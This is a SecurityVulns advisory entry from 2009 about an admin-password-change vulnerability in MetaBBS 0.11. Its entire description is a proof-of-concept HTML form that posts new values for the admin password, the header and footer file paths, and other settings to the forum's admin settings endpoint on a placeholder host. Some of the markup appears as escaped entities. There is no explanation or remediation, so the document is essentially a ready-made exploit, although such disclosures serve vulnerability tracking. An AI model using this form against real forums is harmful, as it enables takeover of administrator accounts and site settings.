metabbs 0.11 Change admin password vulnerability

2009-02-05T00:00:00
ID SECURITYVULNS:DOC:21294
Type securityvulns
Reporter Securityvulns
Modified 2009-02-05T00:00:00

Description

Metabbs 0.11 2008-08-06 19:56

<form method="post" action="http://test.com/metabbs/admin/settings/?"> <dl> <dt><label for="settings_admin_password">Admin password</label></dt> <dd><input id="settings_admin_password" size="20" name="settings[admin_password]" value="" type="password" /></dd>

    &lt;dt&gt;&lt;label for=&quot;settings_global_header&quot;&gt;Header file&lt;/label&gt;&lt;/dt&gt;
    &lt;dd&gt;&lt;input id=&quot;settings_global_header&quot; size=&quot;30&quot; name=&quot;settings[global_header]&quot; value=&quot;&quot; type=&quot;text&quot; /&gt;&lt;/dd&gt;

    &lt;dt&gt;&lt;label for=&quot;settings_global_footer&quot;&gt;Footer File&lt;/label&gt;&lt;/dt&gt;
    &lt;dd&gt;&lt;input id=&quot;settings_global_footer&quot; size=&quot;30&quot; name=&quot;settings[global_footer]&quot; value=&quot;&quot; type=&quot;text&quot; /&gt;&lt;/dd&gt;

    &lt;dt&gt;&lt;label for=&quot;settings_theme&quot;&gt;Site theme&lt;/label&gt;&lt;/dt&gt;
    &lt;dd&gt;&lt;input id=&quot;settings_theme&quot; size=&quot;30&quot; name=&quot;settings[theme]&quot; value=&quot;&quot; type=&quot;text&quot; /&gt;&lt;/dd&gt;

    &lt;dt&gt;&lt;label for=&quot;settings_default_language&quot;&gt;Language&lt;/label&gt;&lt;/dt&gt;
    &lt;dd&gt;
            &lt;dd&gt;&lt;input id=&quot;ettings_default_language&quot; size=&quot;30&quot; name=&quot;settings[default_language]&quot; value=&quot;&quot; type=&quot;text&quot; /&gt;&lt;/dd&gt;
            &lt;input name=&quot;settings[always_use_default_language]&quot; value=&quot;0&quot; type=&quot;hidden&quot; /&gt;&lt;input id=&quot;settings_always_use_default_language&quot; name=&quot;settings[always_use_default_language]&quot; value=&quot;1&quot; type=&quot;checkbox&quot; /&gt;                
    &lt;label for=&quot;settings_always_use_default_language&quot;&gt;Always Use Default Language&lt;/label&gt;   &lt;/dd&gt;

    &lt;dt&gt;&lt;label for=&quot;settings_timezone&quot;&gt;TimeZone&lt;/label&gt;&lt;/dt&gt;
    &lt;dd&gt;
            &lt;dd&gt;&lt;input id=&quot;settings_timezone&quot; size=&quot;30&quot; name=&quot;settings[timezone]&quot; value=&quot;&quot; type=&quot;text&quot; /&gt;&lt;/dd&gt;

</dl>

<h2>Advanced Setting</h2> <p><input name="settings[force_fancy_url]" value="0" type="hidden" /> <input id="settings_force_fancy_url" name="settings[force_fancy_url]" value="1" type="checkbox" /> <label for="settings_force_fancy_url">Fancy URL Force Apply</label></p>

<p><input type="submit" value="OK" /></p> </form>